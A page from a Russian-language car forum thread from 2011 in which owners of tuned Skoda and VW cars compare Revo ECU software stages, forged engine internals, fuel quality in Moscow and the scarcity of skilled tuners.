+ Ответить в теме
Страница 15 из 81 ПерваяПервая ... 5 13 14 15 16 17 25 65 ... ПоследняяПоследняя
Показано с 141 по 150 из 809

Тема: чип vs чип (подход, особенности, проблемы и т.п.)

GTI-Racing Глум is on a distinguished road Аватар для Глум
    Машина
    Skoda vRS 3**hp
    Цитата Сообщение от BON Посмотреть сообщение
    Со слов турбораббита, все что свыше 400 л.с. нужен низ мотора другой. У рево такого нет, так чтоже они тебе предложат........ ты и так вроде бы получил какие то пони ?
    У Рево нет, у меня есть. Конфигурация мотора, включая новую СЖ, марку поршней и шатунов была озвучена Ревовцам. Софт они дали. Все хорошо.
    Под "хорошо" я понимаю - ездиет, заводится, не доставляет проблем... Если к этому приписать "400лс" - тут начинаются ньюансы, начиная от качества бензина и заканчивая "не, так калибровать мы не будем"...
    Стейдж4, кстати, у них предполагает "другой" низ.

GTI-Racing turborabbit is a splendid one to behold turborabbit is a splendid one to behold turborabbit is a splendid one to behold turborabbit is a splendid one to behold turborabbit is a splendid one to behold turborabbit is a splendid one to behold turborabbit is a splendid one to behold Аватар для turborabbit
    Машина
    MKVI GTi 475hp
    Со слов турбораббита, все что свыше 400 л.с. нужен низ мотора другой. У рево такого нет, так чтоже они тебе предложат........ ты и так вроде бы получил какие то пони ?
    ====
    Кмк у Глума мотор уже кованный, но может я чего не так понял

Добавлено через 1 минуту
    Цитата Сообщение от Глум Посмотреть сообщение
    начинаются ньюансы, начиная от качества бензина
    ====
    Качество бензина это очень важный аргумент и тут мало чего можно сделать. Но я просто не верю что в Москве нет нормального бензина !
    Последний раз редактировалось turborabbit; 09.09.2011 в 13:56. Причина: Добавлено сообщение

Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Машина
    Skoda
    У Рево нет, у меня есть. Конфигурация мотора, включая новую СЖ, марку поршней и шатунов была озвучена Ревовцам. Софт они дали. Все хорошо.
    Под "хорошо" я понимаю - ездиет, заводится, не доставляет проблем... Если к этому приписать "400лс" - тут начинаются ньюансы, начиная от качества бензина и заканчивая "не, так калибровать мы не будем"...
    Стейдж4, кстати, у них предполагает "другой" низ.
    Я не увидел ст.4 у Рево на сайте, там Ст.3 на базе 3071 ........... и в спецификации, тоже не увидел про низ мотора. Есть ссылка ?
    https://products.revotechnik.com/pro....aspx?pvID=601

Добавлено через 1 минуту
    Цитата Сообщение от turborabbit Посмотреть сообщение
    ====
    Качество бензина это очень важный аргумент и тут мало чего можно сделать. Но я просто не верю что в Москве нет нормального бензина !
    Он есть, тоже не верю. Много тестов в разных журналах 98-й у всех 98-й. Другое дело, что нужно что-то большее, но и тут есть например и 100 и 105 в наличии и всегда.
    Последний раз редактировалось BON; 09.09.2011 в 14:03. Причина: Добавлено сообщение
    песок сыпется....не останавливайтесь на достигнутом !

Машина
    Skoda vRS 3**hp
    Я не увидел ст.4 у Рево на сайте, там Ст.3 на базе 3071 ........... и в спецификации, тоже не увидел про низ мотора. Есть ссылка ?
    https://products.revotechnik.com/pro....aspx?pvID=601
    Завуалированно это выглядит так "Revo Stage 4 software has been developed to compliment cars running more extensive engine modifications. Revo Stage 4 software is tuned to suit higher level hardware upgrade packages than Stage 3 maximising the full potential of your vehicle." :) Типа - стейдж3 + ковка.

Про бензин - нет, я не говорю, что его НЕТ..Я заправляюсь обычным товарным 98Ультимейт на бП. Машина на евридей..Именно на ЭТОМ бензине я хочу настраивать машину. Другой вопрос - на каждой конкретной заправке (БП в данном случае) бензин может чуть отличаться в разные стороны по качеству. Вот и все.

Низ - поршни ковка Wossner , СЖ 9.5, шатуны IE.

Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Машина
    Skoda
    Завуалированно это выглядит так "Revo Stage 4 software has been developed to compliment cars running more extensive engine modifications. Revo Stage 4 software is tuned to suit higher level hardware upgrade packages than Stage 3 maximising the full potential of your vehicle." :) Типа - стейдж3 + ковка.

Про бензин - нет, я не говорю, что его НЕТ..Я заправляюсь обычным товарным 98Ультимейт на бП. Машина на евридей..Именно на ЭТОМ бензине я хочу настраивать машину. Другой вопрос - на каждой конкретной заправке (БП в данном случае) бензин может чуть отличаться в разные стороны по качеству. Вот и все.

Низ - поршни ковка Wossner , СЖ 9.5, шатуны IE.
    Сил 450 ну минимум должно быть (
    песок сыпется....не останавливайтесь на достигнутом !

Так суть вопроса то и не раскрыта - КТО настроит?:) В Москве..
    Серега, ИМХО - "кто именно может настроить" даже больше одного:), но иногда многое зависит от:

Цитата Сообщение от turborabbit Посмотреть сообщение
    ...есть очень существенная разница когда ты сам выбираешь какую машину ты хочешь делать, а какую нет...
    Добавлено через 1 минуту
    Цитата Сообщение от Zerg Посмотреть сообщение
    Исключение составляют те прошивки, которые пишутся кастом не особо подготовленными людьми.
    Что значит "неподготовленными"? Студенты с Ваг-комом чтоль? :)

Добавлено через 3 минуты
    Январь 5.1 можно еще.
    Я думаю, что, если настройщик предлагает ставить Январь - то он не умеет шить MED :)
    Последний раз редактировалось alex323-69; 09.09.2011 в 14:38. Причина: Добавлено сообщение

Машина
    Skoda vRS 3**hp
    Цитата Сообщение от alex323-69 Посмотреть сообщение
    Серега, ИМХО - "кто именно может настроить" даже больше одного:), но иногда многое зависит от:
    Ок, Леш:) Сформулирую так - настроить ТАК, чтобы показатели были приближены к спекам таких же конфигов ТАМ (на товарном бензе)...Без оговорок "да у тя тут говно, да тут это надо поменять" и т.д. Ибо по умолчанию мы примем переменные в уравнении, когда все у нас исправно, все нужные девайсы стоят и все качает, дует и т.д...
    ЗЫ. Настроить - больше одного, настроить, чтобы ехало - тоже больше одного..
    Теперь, Лех, вопрос - сколько тех, кто ЗНАЕТ и ПОНИМАЕТ, что он настраивает?:)

GTI-Racing turborabbit is a splendid one to behold turborabbit is a splendid one to behold turborabbit is a splendid one to behold turborabbit is a splendid one to behold turborabbit is a splendid one to behold turborabbit is a splendid one to behold turborabbit is a splendid one to behold Аватар для turborabbit
    Машина
    MKVI GTi 475hp
    Сил 450 ну минимум должно быть (
    ====
    Если форсунок, тнвд, тннд и периферии хватит.

GTI-Racing WladimirGW is on a distinguished road Аватар для WladimirGW
    Машина
    Skoda Octavia A5 FL 1.8TSI + K04
    Ух как у вас тут интересно, какие страсти, посерьёзней чем у нас ))) :-D

Теперь, Лех, вопрос - сколько тех, кто ЗНАЕТ и ПОНИМАЕТ, что он настраивает?:)
    Меньше Серег, меньше... чем:

Настроить - больше одного, настроить, чтобы ехало - тоже больше одного..
    ((( и это грустно...
    Но прогресс идет, конкуренция все сильнее, а в ней лишние знания это плюсик в копилку.
    Усе будет хорошо :)

+ Ответить в теме
Страница 15 из 81 ПерваяПервая ... 5 13 14 15 16 17 25 65 ... ПоследняяПоследняя